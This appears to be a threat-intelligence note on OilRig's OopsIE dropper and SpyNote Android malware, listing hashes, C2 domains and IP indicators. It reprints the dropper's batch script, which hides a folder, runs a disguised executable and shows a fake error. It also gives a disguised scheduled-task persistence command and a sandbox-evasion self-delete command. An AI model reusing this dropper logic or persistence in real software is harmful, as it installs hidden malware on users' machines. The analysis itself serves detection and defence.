Oilrig OopsIE malware and SpyNote mobile malware
OopsIE dropper
MD5fe466788a06fc5646bd52fe6732d59bf
SHA-1b774c171b76c49be5b5efa9374c7d40f5000e184
Authentihash824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d
Fake failure message:
C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat
@echo off
set ztmp=C:\Users\admin\AppData\Local\Temp\ztmp
set MYFILES=C:\Users\admin\AppData\Local\Temp\afolder
set bfcec=t23141.exe
attrib +h C:\Users\admin\AppData\Local\Temp\ztmp
@echo off
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5" /v version
if %errorlevel% equ 0 goto v3
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
if %errorlevel% equ 0 goto v4
goto commonexit
:v3
copy %MYFILES%\WinSyncMetastoreV2.exe C:\programdata\WinSyncMetastoreV2.exe
C:\programdata\WinSyncMetastoreV2.exe
goto commonexit
:v4
copy %MYFILES%\WinSyncMetastoreV4.exe C:\programdata\WinSyncMetastoreV4.exe
C:\programdata\WinSyncMetastoreV4.exe
goto commonexit
:commonexit
start "" /wait cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"
exit
Installation
Drops
OopsIE malware WinSyncMetastore.exe
(https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)
WinSyncMetastoreV2.exe
MD55998ef679682878e68d5ac4a1733fac5
SHA-25636e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23
WinSyncMetastoreV4.exe
MD5d41207d54b69fb3eeb7a104f7d36c7b0
SHA-256055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9
Persistency
cmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\ProgramData\WinSyncMetastore.vbs" /f
C2:
defender-update.com
Samples will run these commands if they detect a sandbox:
cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe
SpyNote android malware
213.227.140.35, the IP address of defender-update\.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile rat.
client.apk
MD52820c84cf9f34fe999da0bcedea6915d
SHA-10f3ae5c85151686b836fd95e2d680201679101e9
SHA-2569727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d
102.apk
MD527aaf0e49ebc240933ea5d1a04747977
SHA-1c7e7ad6d763a41b8d3d7d9301acbe53674041d75
SHA-256
d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43
IOCs
defender-update.com
windowspatch.com
herkhabar.com
89.248.173.131
213.227.140.35:3210
178.32.211.5
Windows Implantment Module.exe
d41207d54b69fb3eeb7a104f7d36c7b0
ea6321f55ea83e6f2887a2360f8e55b0
3cf8aff7c56cf477bde9adbd543abc40
fe466788a06fc5646bd52fe6732d59bf
27aaf0e49ebc240933ea5d1a04747977
5998ef679682878e68d5ac4a1733fac5
2820c84cf9f34fe999da0bcedea6915d